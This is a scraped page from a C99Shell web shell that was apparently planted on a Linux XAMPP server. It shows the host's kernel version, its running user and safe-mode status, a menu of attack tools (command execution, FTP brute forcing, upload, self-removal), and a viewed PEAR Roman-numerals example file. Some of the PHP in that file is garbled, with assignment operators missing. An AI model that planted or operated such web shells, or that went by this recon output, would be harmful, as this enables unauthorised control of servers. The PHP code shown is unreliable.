!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/Numbers_Roman/docs/examples/   drwxr-xr-x
Free 13.58 GB of 61.93 GB (21.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     example.php (1.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Numbers Roman example

require_once("Numbers/Roman.php");
$Num rand(1,3999); 
$NumHtml rand(500,5999999);

//converting a random number between 1 and 3999 from Arabic to the Roman Numeral
//uppercase true, html false, then back to Arabic
$key =  Numbers_Roman::toNumeral($Num,true,false);
$NumKey Numbers_Roman::toNumber($key);


// converting a random number between 500 and 5 999 999 to the Roman Numeral
$RomeHtml     =  Numbers_Roman::toNumeral($NumHtml,true,true);       //uppercase true html true
$RomenoHtml   =  Numbers_Roman::toNumeral($NumHtml,true,false);    //uppercase true html false
$RomeHtmlnoLC =  Numbers_Roman::toNumeral($NumHtml,false,true);  //uppercase false html true
$RomenoHtmlLC =  Numbers_Roman::toNumeral($NumHtml,false,false);  //uppercase false html false

$toArabic Numbers_Roman::toNumber($RomenoHtml); //back to the Arabic number 

echo "Random: ".$Num." (To roman) -> ".$key." (Back to arabic) -> ".$NumKey." <BR> <BR>";

echo 
"Random with HTML enabled converting ".$NumHtml." into a Roman Numeral ".$RomeHtml."<BR>";
echo 
"Lowercase html $RomeHtmlnoLC.. <BR> ".$RomenoHtml." uppercase no html <BR> 
$RomenoHtmlLC lowercase no html <BR>and back to Arabic ".$toArabic."";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4892 ]--